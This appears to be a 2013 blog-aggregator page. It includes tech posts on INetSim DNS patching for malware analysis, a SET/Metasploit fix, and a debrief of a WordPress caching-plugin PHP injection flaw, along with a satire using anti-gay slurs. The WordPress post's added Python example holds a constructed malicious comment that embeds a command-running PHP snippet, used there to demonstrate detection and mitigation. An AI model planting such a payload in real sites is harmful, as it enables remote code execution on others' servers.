— Since I work mostly from home, it forces me to live 24 hours a day with a queer like Bernard. Not to mention that my relationship with Sabrina is suffering enormously.
Their friends did try to find an arrangement.
— I’m willing to sell my share of the flat, Bernard tells us, but I demand custody of Kiki, my hamster.
— No way am I leaving my hamster to a fairy, Jean-Pierre rages.
— It’s my hamster, you old pervert!
The two spouses have therefore launched Divorce Pour Tous, a collective whose aim is to demand equality before divorce. Kiki quickly became its icon, as an activist waving a sign bearing his likeness tells us:
— If I’m here it’s because I find it unfair that a poor creature like Kiki suffers because of human stupidity. Because of a badly designed law, this hamster is forced to live in a permanently conflictual situation, torn between his two dads. It’s awful. Parliament must act to put an end to this situation! To save Kiki, we demand divorce for all.
And the hundred or so activists take up the chant with her:
— To save Kiki, divorce for all!
April 22, 2013
Frederic Hornain
JBoss Application Server has a new name…
JBoss AS was renamed to reduce confusion. The term JBoss commonly referred to: the JBoss Application Server project, the JBoss Community or the Red Hat JBoss product line.
Ref : http://www.wildfly.org/
Frank Goossens
Music from Our Tube; Laura Mvula
There are real gems to be found on KCRW’s YouTube channel, which features artists performing live in the studio. Laura Mvula is an up-and-coming UK vocalist and you can see her performing “Sing To The Moon” below. Enjoy!

Xavier Mertens
Belgian Edition of The Hacknowledge Contest

Last weekend, an ethical hacking event was organised in Belgium. The Hacknowledge Contest came to Charleroi and was hosted at the CPEHN. This event was previously organised only in France, thanks to the initiative of the ACISSI. Last year, they decided to open their challenges to other countries. The current list of participating countries is: Côte d’Ivoire, Morocco, Benelux, Spain and France. The organisers are already looking to extend their list with other countries. If you are interested, maybe contact them.
Initially, I registered a small team with a colleague, and in the end we were five ethical hackers/friends participating as “UID(0)“. So, we went to Charleroi on Saturday afternoon to attend a bunch of small talks about information security. Small event and a relaxed atmosphere. The covered topics were:
- Zataz.com, the well-known French website and the process in place to notify organizations of data breaches and/or security issues.
- The security of our payment cards starting from old models based on a magstripe up to the state-of-the-art (but not from a security point of view) NFC chipsets.
- A nice presentation about social engineering with lots of funny examples (my preferred presentation, by Seb Baudru, see the picture below)
- IPv6 & security
- An overview of the security landscape in Belgium (latest major security incidents and whom to contact in case of issues – CERT.be, FCCU, etc)

After a break and the registration of all teams, the challenges started for a period of 12 hours (Saturday 10PM to Sunday 10AM). No CTF, no blue team nor red team, but a list of challenges to solve, similar to the SANS NetWars. Each challenge solved gives you points. The seventy challenges were split into categories like:
- Web technologies
- Crypto
- Network
- Forensics
- Hardware (lockpicking, Teensy, barcodes, …)

It was very friendly, with good times and music. We finished in third position but very close to the second team… Only the first two teams won, too bad! The final contest will be organised in France and the winning team will receive a very nice prize: an all-inclusive trip to Las Vegas to attend the DefCON security conference!
I don’t often participate in events like this one. I liked the limited number of teams (5) and the friendly atmosphere between the teams. Not too small, not too big, well organized. The event was also covered by some Belgian media.
Patrick Debois
What if Devops was invented by Coca Cola
Ever wondered what Devops would look like when it would be invented by Coca Cola?
Enjoy my Ignite session from Devopsdays Paris 2013
Wim Coekaerts
Importing Oracle VM templates through a proxy
One simple way around this is to take one server that's on the same network as the Oracle VM Servers' management network, for instance the Oracle VM Manager system, and install something like TinyProxy on that machine. Then use that server name as the proxy in Oracle VM Manager when you import a VM, VM Template or VM Assembly.
TinyProxy can be found in the EPEL repository (http://fedoraproject.org/wiki/EPEL). The tinyproxy RPM will install without issue on Oracle Linux. It is very easy/simple to configure and this can be a good workaround or solution to make it easy to import templates or VMs while the servers are on a more isolated network.
April 21, 2013
Christophe Vandeplas
Resolving DNS requests for malware analysis
One thing that was frustrating me was the default behavior of the DNS service within INetSim. When a client connects to INetSim to resolve a DNS name the service will always respond with the same fixed IP address.
This is rather annoying when analyzing malware that uses multiple DNS names to connect to multiple command and control servers, or just performs test connections. As the DNS service replies with the same IP, and the malware establishes a TCP connection to that IP, you can't relate the domain name to the communication. There is no clear way for you to know which TCP session, and which communication, matches which command and control server.
Except if you hardcode the different domain names in the configuration file, of course. However, how do you encode a name in that configuration if you don't know the name yet? Basic static analysis could already have given you a name, but that is likely not the case if the malware was packed with a non-standard packer. So should I first spend loads of time manually unpacking the malware? Or should I run the malware, look at the DNS requests, encode these DNS names in my INetSim, restore from snapshot, re-infect the machine, see new domain names, re-encode them, etc...?
Being a lazy person, this doesn't motivate me a lot, so when I was following Lenny Zeltser's SANS 610 class some time ago I threw him this question. Fortunately I was not the first one with this frustration, and another student of his had written a Python script to do incremental DNS responses and gave me a copy. However, I didn't like the idea of using yet another additional tool, so I looked into the code of INetSim and a hack looked easier than expected.
So I wrote a simple patch that added this new functionality:
- for each dns request, a new IP is returned (i++)
- requesting the same dns name twice returns the same IP of course (I save it in the temporary hash with the hardcoded hostnames)
- the start IP is the default IP
- functionality is activated by a configuration flag.
There is however a limitation: once the x.y.z.254 IP is reached the DNS response will stay the same IP.
This patch has been sent to the developers of INetSim, and they were going to look into integrating it when they had a bit more time. It seems I have forgotten to publish this 5-month-old code here.
You can apply the patch using the following commands:
tar xzf inetsim-1.2.3.tar.gz
wget http://documentation.vandeplas.com/inetsim/inetsim_incrementaldns.patch
cd inetsim-1.2.3/
patch -p1 < ../inetsim_incrementaldns.patch
This will output (the fuzz is because the patch was for INetSim v1.2.2):
patching file conf/inetsim.conf
patching file lib/INetSim/Config.pm
patching file lib/INetSim/DNS.pm
Hunk #1 succeeded at 67 with fuzz 2.
Now install INetSim, start it up and perform some DNS queries. We see the responses increment each time, while staying consistent when requesting the same name.
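The allocation rules above, as an added Python example (not the INetSim patch itself, which is Perl): a new name gets the next address, a repeated name gets the address it was first given, the sequence starts at the configured default IP, stops growing at x.y.z.254, and the whole thing sits behind a flag. The default IP, static host table and query names are constructed for the example; the reverse lookup is the correlation between destination IP and domain name that the post wants back.

```python
import ipaddress


class IncrementalDns:
    """Fake A-record resolver reproducing the behaviour of the patch:
    - each new name is answered with the next IP (i++)
    - the same name always gets the IP it was first given
    - the sequence starts at the default IP
    - once x.y.z.254 is reached, every later new name gets that IP
    - incremental=False reproduces stock INetSim (one fixed IP for everything)
    """

    def __init__(self, default_ip, incremental=True, static_hosts=None):
        self.default = ipaddress.IPv4Address(default_ip)
        self.incremental = incremental
        # Hard-coded hostnames from the config share one table with the
        # dynamically allocated names, so repeats are answered consistently.
        self.table = {h.lower(): ipaddress.IPv4Address(ip)
                      for h, ip in (static_hosts or {}).items()}
        self.next_ip = self.default
        # Last address handed out: the .254 of the default IP's /24.
        self.ceiling = ipaddress.IPv4Address((int(self.default) & ~0xFF) + 254)

    def resolve(self, qname):
        """Answer an A query for qname; returns the IP as a dotted string."""
        name = qname.rstrip(".").lower()
        if name in self.table:
            return str(self.table[name])
        if not self.incremental:
            return str(self.default)      # stock INetSim behaviour
        ip = self.next_ip
        self.table[name] = ip
        if ip < self.ceiling:
            self.next_ip = ip + 1         # i++ (stops at .254)
        return str(ip)

    def names_for(self, ip):
        """Reverse lookup: which queried names were answered with this IP.
        This is what lets an analyst tie a TCP session's destination back
        to the domain the sample asked for."""
        addr = ipaddress.IPv4Address(ip)
        return sorted(n for n, a in self.table.items() if a == addr)


def correlate(queries, destinations, default_ip="10.10.10.10"):
    """Constructed run: feed the DNS names a sample queried through the
    resolver, then label each observed TCP destination with its names."""
    dns = IncrementalDns(default_ip)
    for q in queries:
        dns.resolve(q)
    return {dst: dns.names_for(dst) for dst in destinations}


if __name__ == "__main__":
    # Constructed sample traffic, not captured data.
    seen_queries = ["c2-a.example", "c2-b.example", "c2-a.example"]
    seen_destinations = ["10.10.10.10", "10.10.10.11"]
    for dst, names in correlate(seen_queries, seen_destinations).items():
        print(dst, "->", ", ".join(names))
```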
April 19, 2013
LOADays Organizers
Post-LOADays Report
We survived a fourth edition of LOADays; we had a good turn-out and a lot of positive feedback. We want to thank all the speakers, sponsors and visitors. A special thanks goes to Don Bosco Werken en Leren Wilrijk, who provided us with the venue and a lot more.
The slides of the presentations have been added. Use the Schedule to find the presentations.
We would like people to subscribe to our mailing list. This mailing list will be used to announce next events, related events or colocated events. You can hang out on irc FreeNode channel #load, or just mail us on info(at)loadays(dot)org for any questions, suggestions or remarks.
Here are some of the blogs about LOADays 2013 :
- http://czanik.blogs.balabit.com/2013/04/czp-loadays/
- http://www.krisbuytaert.be/blog/initial-loadays-speakers-announced
- http://toshaan.com/loadays-2013-report.html
- http://grep.be/blog/en/life/events/load2013
- http://blog.aeolusproject.org/aeolus-will-be-at-loadays-2013/
- https://blog.kumina.nl/2013/04/loadays-2013-and-kumina/
- http://www.openminds.be/nl/evenementen/detail/loadays
- http://www.open-future.be/loadays-6-till-7th-april
- http://www.openqrm-enterprise.com/community/project-blog/post/article/openqrm-tutorial-at-loadays-2013-in-antwerp-1.html
- http://blog.opennebula.org/?p=4460
- http://blog.opennebula.org/?p=4421
- http://architects.dzone.com/articles/initial-loadays-speakers
Kris Buytaert
Evolution Woes and yum magic
I'm an oldschool guy .. I still love pop3(s) to get my mails locally and read them with my fat email client, Evolution.
So when gmail breaks their pop/imap infra I'm screwed for a while. I hate reading mail from a web gui and the collapsed threading model gmail uses makes me nauseous.
So I fiddled with my config .. disabled it.. deleted the account.. created it again. But even after gmail was up again, I couldn't access my mail from my favourite client. Yet from other clients it seemed to work.
This obviously is real fun when you are travelling and trying to keep an eye on a number of different email threads ..
So I'm back home from Paris now and spent some 10 minutes figuring out what could be wrong.
I ran into https://bugzilla.redhat.com/show_bug.cgi?id=949180, which points out that for newly created accounts there is a problem with the keyring prompting, and refers to https://bugzilla.redhat.com/show_bug.cgi?id=953641, which states that gcr-3.6.2-3 breaks password prompt/keyring unlocks.
And indeed ..
yum shell
Loaded plugins: langpacks, presto, ps, puppetverify, refresh-packagekit
> remove gcr
> install gcr-3.6.2-1.fc18
adobe-linux-x86_64                                       | 951 B     00:00
fedora/18/x86_64/metalink                                |  31 kB    00:00
google-chrome                                            | 951 B     00:00
google-earth                                             | 951 B     00:00
google-talkplugin                                        | 951 B     00:00
rpmfusion-free-updates                                   | 3.3 kB    00:00
rpmfusion-nonfree-updates                                | 3.3 kB    00:00
updates/18/x86_64/metalink                               |  24 kB    00:00
rpmfusion-free-updates/primary_db                        | 279 kB    00:01
> run
--> Running transaction check
---> Package gcr.x86_64 0:3.6.2-1.fc18 will be installed
---> Package gcr.x86_64 0:3.6.2-3.fc18 will be erased
--> Finished Dependency Resolution
================================================================================
 Package        Arch           Version               Repository          Size
================================================================================
Installing:
 gcr            x86_64         3.6.2-1.fc18          fedora             627 k
Removing:
 gcr            x86_64         3.6.2-3.fc18          @updates           2.3 M
Transaction Summary
================================================================================
Install  1 Package
Remove   1 Package
Total download size: 627 k
Is this ok [y/N]: y
Downloading Packages:
gcr-3.6.2-1.fc18.x86_64.rpm                              | 627 kB    00:02
Running Transaction Check
Running Transaction Test
Transaction Test Succeeded
Running Transaction
  Installing : gcr-3.6.2-1.fc18.x86_64                                    1/2
  Cleanup    : gcr-3.6.2-3.fc18.x86_64                                    2/2
  Verifying  : gcr-3.6.2-1.fc18.x86_64                                    1/2
  Verifying  : gcr-3.6.2-3.fc18.x86_64                                    2/2
Removed:
  gcr.x86_64 0:3.6.2-3.fc18
Installed:
  gcr.x86_64 0:3.6.2-1.fc18
Finished Transaction
> quit
Leaving Shell
That solved the problem.
Xavier Mertens
Fixing SET 5.0.3 & Metasploit 4.6.0
A quick post to share with you my feedback about an issue I faced after a SET (“Social Engineering Toolkit“) upgrade to the latest version (5.0.3). SET is a wonderful tool that you must master. I’m using SET on an EC2 instance because it does not interfere with my other IP addresses and I can enable all ports without any issue (nothing else is running on this instance). Note that Amazon has a specific policy for pentesting from their infrastructure; have a look here.
My current environment is:
- Ubuntu 12.04 LTS (fully patched)
- SET 5.0.2 (installed from the git repository)
- Metasploit 4.6
After the SET upgrade, I faced the following error when launching Metasploit from SET (full error dumped to allow the Google crawler to do its job):
set:phishing> Setup a listener [yes|no]:yes
/opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require': no such file to load -- active_support/concern (LoadError)
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/core/module_manager/cache.rb:4
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/core/module_manager.rb:27
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/core/framework.rb:66
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:34
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `fastlib_original_require'
    from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/apps/pro/msf3//msfconsole:136
Metasploit was running fine when started manually from the command line. Google found a thread on a forum about the same kind of problem. The suggestion was to set up the right environment for Metasploit using the setenv.sh script. Note: be sure to execute the script using ‘source‘, otherwise a new shell will be spawned and closed immediately without changing your environment:
# source /opt/metasploit/scripts/setenv.sh
# se-toolkit
Same issue. I tried to load ‘active_support/concern’ manually, and it worked:
# ruby
require('active_support/concern')
^D
#
Finally, I upgraded the installed Ruby gems with the following command:
# gem update `gem list | cut -d ' ' -f 1`
And the problem was solved! Don’t ask me why; I did not dive into the code and I’m not a Ruby guru, but it worked for me. If you are facing the same problem, think about upgrading your gems. Just sharing…
Here is my list of installed Gems:
# gem list

*** LOCAL GEMS ***

actionmailer (3.2.13, 3.2.11)
actionpack (3.2.13, 3.2.11)
activemodel (3.2.13, 3.2.11)
activerecord (3.2.13, 3.2.11)
activeresource (3.2.13, 3.2.11)
activesupport (3.2.13, 3.2.11)
acts_as_list (0.2.0, 0.1.5)
arel (4.0.0, 3.0.2)
authlogic (3.3.0, 3.1.0)
bigdecimal (1.1.0)
bson (1.8.5, 1.6.4)
bson_ext (1.6.1)
builder (3.2.0, 3.0.4)
bundler (1.3.5, 1.1.2)
carrierwave (0.8.0, 0.7.0)
chunky_png (1.2.8, 1.2.6)
coderay (1.0.9, 1.0.8)
compass (0.12.2)
daemons (1.1.9, 1.1.8)
erubis (2.7.0)
eventmachine (0.12.10)
formtastic (2.2.1, 2.1.1)
fssm (0.2.10, 0.2.9)
hike (1.2.2, 1.2.1)
i18n (0.6.4, 0.6.1)
ice_cube (0.10.0, 0.9.1)
io-console (0.3)
journey (1.0.4)
jquery-rails (2.2.1, 2.1.3)
json (1.7.7, 1.6.6, 1.6.5, 1.5.4)
kaminari (0.14.1, 0.14.0)
libv8 (3.16.14.1, 3.11.8.17 x86_64-linux, 3.3.10.4 x86_64-linux)
liquid (2.5.0, 2.3.0)
mail (2.5.3, 2.4.4)
method_source (0.8.1)
mime-types (1.22)
minitest (4.7.2, 2.5.1)
msgpack (0.4.6 ruby)
multi_json (1.7.2, 1.5.0)
nokogiri (1.5.2 ruby)
pg (0.13.2 ruby)
polyglot (0.3.3)
pry (0.9.12, 0.9.10)
rack (1.4.5, 1.4.1 ruby)
rack-cache (1.2)
rack-ssl (1.3.3, 1.3.2)
rack-test (0.6.2)
rails (3.2.13, 3.2.11)
railties (3.2.13, 3.2.11)
rake (10.0.4, 10.0.3, 0.9.2.2)
rdoc (4.0.1, 3.12, 3.9.4)
ref (1.0.4)
robots (0.10.1)
sass (3.2.7, 3.2.1)
slop (3.4.4, 3.3.3)
sprockets (2.9.2, 2.2.2)
state_machine (1.2.0, 1.1.2)
therubyracer (0.9.10)
thin (1.3.1)
thor (0.18.1, 0.16.0)
tilt (1.3.7, 1.3.3)
treetop (1.4.12)
tzinfo (0.3.37, 0.3.35)
April 18, 2013
Matt Casters
The Pentaho Big Data Forum
Dear friends,
If you’re in the Washington DC area next Tuesday, April 23rd, why not drop in on our complimentary Big Data Forum:
http://events.pentaho.com/Big-Data-Forum-Registration.html
Come and listen to us and our partners Cloudera, 10gen and Unisys and see what we can do for you in the Big Data space.
See you soon in DC!
Matt
Frank Goossens
WP Caching plugin vulnerability debrief
Now that both the WP Super Cache and W3 Total Cache developers have released a new version of their respective plugins (upgrade first, continue reading after), it seems time for a small “post mortem”.
The problem was in the interpretation of dynamic snippets, which are contained inside a number of specific HTML-comment tags. These snippets allow both plugins (and their predecessor WP Cache) to cache entire pages while keeping a limited amount of dynamic, PHP-generated content in them that is executed on the fly whenever the cached page is served. Think ESI in e.g. Varnish.
The vulnerability, which was originally discovered by kisscsaby and reported 3 weeks ago on the wordpress.org plugins support forum, had multiple causes:
- Unlike ESI, dynamic snippets can not only be includes (mclude) but also arbitrary PHP code (mfunc). Whereas including known files can be considered more or less safe, executing PHP code taken from the page itself introduces a risk as soon as any part of that page is user-controlled.
- As WP Super Cache & W3 Total Cache keep entire pages in cache and as pages can contain comments, that user generated content is parsed for dynamic snippets as well.
- WordPress core by default only allows a limited set of HTML in comments (“a blockquote code em strong ul ol li”), but it also leaves HTML comments in place.
As a result, blogs running WP Super Cache (before version 1.3) or W3 Total Cache (before version 0.9.2.9) were at risk of PHP code injection. A blog comment could contain a dynamic snippet (inside an HTML comment) and WordPress core did not filter it out. Once such a malicious comment had been submitted, the next cached version of the page was built with the injected PHP code in it, and the first request served from that cached page executed it.
I stumbled on the vulnerability report about a week and a half ago, while researching why dynamic snippets weren’t executing when Autoptimize was active (simple really: Autoptimize by default removes HTML comments; the upcoming 1.6.3 will leave mfunc/mclude in place). As this seemed like a pretty severe security hole and as there was no feedback from the developers in the support thread, I created a small “stopgap plugin” to mitigate the threat on April 10th, mailed security@wordpress.org and plugins@wordpress.org, and requested that WP Safer Cache be published on wordpress.org on the 11th. A couple of hours later WP Super Cache’s Donncha O Caoimh contacted me, and the same day he released a version (1.3) that fixed this vulnerability by parsing potential exploits out of comments as they are posted and as they are rendered. On April 12th W3 Total Cache’s Frederick Townes confirmed they were working on a fix. Version 0.9.2.9 was released on April 17th; it disables dynamic snippets by default and, when they are enabled, requires a secret alphanumeric key to be included in the snippet, which is checked against one defined in wp-config.php.
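To make the mechanism and both fixes concrete, here is an added Python example of my own; it is not code from WP Super Cache, W3 Total Cache or WordPress. It assumes a simplified tag syntax modelled on the mfunc/mclude markers described above (the regexes approximate the plugins’ parsers rather than reproduce them), a constructed theme page, a constructed malicious comment, and a hypothetical key standing in for the one defined in wp-config.php. Nothing is actually executed: an authorized snippet is replaced by a marker standing in for its output.

```python
import hmac
import re

# Constructed sample inputs (not from the post).
WP_CONFIG_SECRET = "a7Qx91kL"   # assumed: the key a site owner would define in wp-config.php

THEME_HTML = (
    "<html><body>\n"
    "<p>Hits today: <!-- mfunc a7Qx91kL --> echo do_count(); <!-- /mfunc a7Qx91kL --></p>\n"
    "<div id='comments'>\n{comments}\n</div></body></html>\n"
)

# What an attacker posts as a blog comment: core keeps HTML comments, so this survives.
MALICIOUS_COMMENT = (
    "Nice post! <!--mfunc--> system($_GET['c']); <!--/mfunc--> "
    "<!--mclude /tmp/evil.php--><!--/mclude-->"
)

# Assumed tag forms: opening tag, any HTML comment, and a whole open..close snippet.
OPEN_TAG = re.compile(r"<!--\s*(?P<kind>mfunc|mclude)\b(?P<rest>.*?)-->", re.S | re.I)
ANY_HTML_COMMENT = re.compile(r"<!--.*?-->", re.S)
SNIPPET = re.compile(
    r"<!--\s*(?P<kind>mfunc|mclude)\b(?P<rest>.*?)-->"
    r"(?P<inner>.*?)"
    r"<!--\s*/(?P=kind)\b.*?-->",
    re.S | re.I,
)


def find_dynamic_snippets(html):
    """Detection: every mfunc/mclude opening tag in a page, a cache file or a stored comment.
    Returns (kind, text after the tag name) pairs; over-matching is fine for a scanner."""
    return [(m.group("kind").lower(), m.group("rest").strip())
            for m in OPEN_TAG.finditer(html)]


def sanitize_comment(text):
    """Mitigation on the comment path: user-submitted text never carries HTML comments,
    so no snippet marker can reach the cached page (the post's Autoptimize behaviour)."""
    return ANY_HTML_COMMENT.sub("", text)


def snippet_authorized(rest, secret):
    """W3TC-style gate: snippets are off unless a key is configured, and the first token
    after the tag name must equal that key (constant-time comparison)."""
    if not secret:
        return False
    parts = rest.split()
    if not parts:
        return False
    return hmac.compare_digest(parts[0], secret)


def render_cached_page(page_html, secret=None):
    """Simulated cache layer: an authorized snippet becomes an output marker; anything
    else is dropped, never executed. Returns (html, executed, blocked)."""
    executed = blocked = 0

    def _sub(m):
        nonlocal executed, blocked
        if snippet_authorized(m.group("rest"), secret):
            executed += 1
            return "[%s output]" % m.group("kind").lower()
        blocked += 1
        return ""

    return SNIPPET.sub(_sub, page_html), executed, blocked


def build_page(comment_text, filter_comments):
    """Assemble the page the cache would store, with or without comment filtering."""
    body = sanitize_comment(comment_text) if filter_comments else comment_text
    return THEME_HTML.format(comments="<p class='comment'>%s</p>" % body)


if __name__ == "__main__":
    vulnerable = build_page(MALICIOUS_COMMENT, filter_comments=False)
    print("snippets in unfiltered page:", find_dynamic_snippets(vulnerable))
    for key in (None, WP_CONFIG_SECRET):
        html, ok, bad = render_cached_page(vulnerable, secret=key)
        print("key=%r executed=%d blocked=%d" % (key, ok, bad))
    print(render_cached_page(build_page(MALICIOUS_COMMENT, True), WP_CONFIG_SECRET)[0])
```

On the unfiltered page the scanner reports three snippets, two of them from the comment; with no key configured nothing runs (the new W3TC default), with the key configured only the theme’s snippet runs, and sanitizing the comment before it is cached removes the injected markers altogether. The same scanner, pointed at a cache directory or at a dump of the wp_comments table, is the quick way to check whether a site was targeted before upgrading.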
Conclusions: the fact that this didn’t generate any fuss (as opposed to W3 Total Cache’s widely publicized information disclosure vulnerability in December 2012) is surprising. PHP code injection is clearly a more severe security risk, and it must have been there for a long time already. The fact that this only got discovered recently is baffling. And why WordPress core doesn’t filter HTML comments out of submitted blog comments, others seem to understand, but to me that remains the biggest mystery of all.
Lionel Dricot
Travel Story
It is hot. In a cloud of foul-smelling dust, the old rattling bus stops in front of us. With the back of my hand, I wipe away the drop of sweat beading above my sunglasses. A noisy crowd rushes into the antique tin-can jalopy, pressing against me, sticking to me and staring at me with amusement.
I glance anxiously at my phone: board bus 42 and insert 200 chtongs into the receptacle next to the driver. Note that the following symbol indicates that payment is made when getting off, not when boarding.
Looking up, I see that the driver is shouting at me. His toothless mouth chews a brownish substance while, with an insistent gesture, he points alternately at the back of the bus and at a lit-up symbol above his head. The pay-on-exit symbol. Behind me, the crowd is getting impatient. I mumble an apology in the local dialect, if I am to believe what my phone drilled into me in the weeks before departure, and I dash towards the back of the vehicle, where I barely have time to grab what used to be a leather strap before the bus lurches off and throws me onto my fellow passengers.
Estimated journey time: 18 minutes, again according to my phone. In any case, it will warn me a few minutes before my stop, in case I doze off.
I have never been much of an adventurer at heart. But technology has let me discover the world in the flesh. For three years now, I have been investing two or three bitcoins a year in a great voyage of discovery. And I have never had reason to regret it. Except the first time when, at one stop, I found a cockroach in my bed sheets. My rating of 0 for that hotel made Wikitravel understand that while I was fairly flexible about comfort, I nonetheless had certain standards of cleanliness.
But the learning system worked wonders: now I only get decent hotels that are still fairly typical and within my budget.
This year, I placed my trust in it entirely. I simply declared that I wanted to visit Zizikistan Oriental, gave my approximate dates and my budget. Wikitravel did the rest, minimizing stopovers and going as far as booking and prepaying the taxi to take me from home to the airport. At each stage, all I have to do is follow my phone. I get reminders for every important event; it points out the buses and the stops to me. It warns me when I need to hurry because I have strayed too far, and displays a QR code to get through the boarding gates at the airport. Even my seats on the plane are chosen according to my tastes.
In the weeks beforehand, I can practise pronouncing the everyday phrases I am going to need: hello, goodbye, thank you, sorry. And let me tell you, Zizikistani is no picnic.
Bzzzz! My phone vibrates. This is where I get off the bus. I drop two 100-chtong coins into the receptacle and mumble a thank-you to the driver. Behind me, the bus pulls away in a roar of burnt old diesel. After a few dozen metres over the scorching stones, I reach an ancient faded sign, put up in antediluvian times by a well-meaning tourist office that was clearly at odds with the English language.
Which does not bother me in the slightest, since my phone gives me all the useful, or simply interesting, information. In this case, it tells me to follow the yellowish symbols placed on wooden posts. No need to keep my eyes glued to my phone: it will warn me if I stray more than a hundred metres from my route, leaving me the choice of marking the detour as intentional or not.
The schedule Wikitravel originally proposed took my preferences into account: historic monuments, walks in nature and a day or two on a beach to finish. As the beaches of Zizikistan Oriental are particularly famous, I adjusted the trip to spend 3 days there. Too bad for the visit to the aboriginal village. But today I have laced up my boots for a 10 km hike through the tropical forest. A walk to a little temple lost in the mists of the jungle, flagged by Wikitravel as not to be missed because it offers an immersion in the local fauna and flora.
Another yellow sign! This hike really is well marked. I stop for a moment to take photos of a splendid dragonfly. I also record a sound clip of the jungle noises. It is magical! All of this automatically generates a slideshow with the map of my movements, my personal notes, the sounds, videos and photos. This slideshow is shared in real time with my close friends and family because, yes, even in the Zizikistani jungle there is 3G.
Every evening, I edit my “travel journal”, deleting the photos my friends have flagged as pointless or botched. I also decide to make some notes public, mostly the reviews, and the prettiest pictures. All of it enriches WikiTravel and will surely be useful to the travellers who follow.
Although they had a clear head start with Latitude and Maps, the hegemony of the omnipresent Google is for once being challenged. And by the Wikimedia Foundation, no less!
Besides, I have always been reluctant to entrust my budget to Google. One of Wikitravel’s strengths is precisely its complete management of the budget. Hotels and flights are of course booked in advance, but Wikitravel goes as far as anticipating the price of the local bus, suggesting how much local currency to withdraw, and recommending the cheap little typical restaurant with no advertising interest other than matching my tastes and my appetite for discovery.
The 1% of the total price automatically paid as a “donation” to the Wikimedia Foundation is therefore only fair. Especially since it now also looks after OpenStreetMap, which is a cornerstone of WikiTravel. Moreover, you can configure that percentage and choose the amount freely. A rather interesting business model, and one that has given a breath of fresh air to the foundation, whose flagship product remains Wikipedia.
The jungle rustles with a thousand sounds. It is wonderful. I, who have never been resourceful, who never managed to properly organize a week at a campsite on the Costa Brava and whose sense of direction is nonexistent, am finally discovering the world. I do not even know which town I will be sleeping in tonight or how I will get there. I let myself be guided and savour every moment.
Look, the path forks, and a lone post tells me that one day a yellow symbol must have guided tourists like me, lost 5 km from the edge of the forest.
I take my phone out of my pocket. The screen is black. I press the button several times, without success. A tropical bird lets out a shrill cry. I jump, cast a worried look around me, then turn back to my phone.
Last night, after sorting the day’s photos sprawled on my bed, I could not be bothered to go and plug it in at the room’s only socket. I told myself that, given how fast it charges, I would do it over breakfast.
I think I forgot. My battery is dead. The leaves rustle around me. Another cry from the bird sends a shiver down my spine…
Photo by myself (it does happen)
April 17, 2013
Xavier Mertens
Win Your Tickets for “Hack In Paris” and “La Nuit Du Hack”
The contest is closed. All tickets have been assigned.
Dear readers, I’ve some gifts for you! I’m very proud (and surprised!) to have been nominated for the European Security Bloggers Awards in two categories: “Best Personal Security Blog” and “Best Security EU Twitter”. To thank you for these nominations (and first of all for reading/following me), I’ve some tickets to distribute for two nice security events in Paris (DisneyLand Convention Center).
The first one is Hack In Paris, which will be held from the 17th to the 21st of June. Then La Nuit du Hack will follow during the weekend. Both are very good events with renowned international speakers. To give you an idea, have a look at my 2012 wrap-ups (day 1 and day 2). A first version of the schedule has already been published. The organizers provided me with 2 x 10 tickets for the two conferences. It wouldn’t be fair to simply distribute them to the first comers, so here is a small contest! Answer the following question (tip: the answer is on my blog):
“After the last edition of BlackHat Europe in Barcelona, I waited for my flight back home with a good friend of mine. Who is it?”
Send your answer by email only to xavier[at]rootshell[dot]be. The following information must be provided in the mail:
- Subject: Contest HIP/NDH 2013
- My friend’s nick, Twitter or full name
- Your ticket preference (HIP, NDH or both)
Good luck! Some rules:
- Be sure to attend the conference (in Paris, June 2013) and not to waste tickets
- Travel & hotel costs are not covered and must be paid by the winners
- HIP tickets are not valid for trainings (only talks)
This year, I won’t be able to attend the conference during the week. But I will join Paris for the weekend, see you there!
PS: Don’t forget to vote!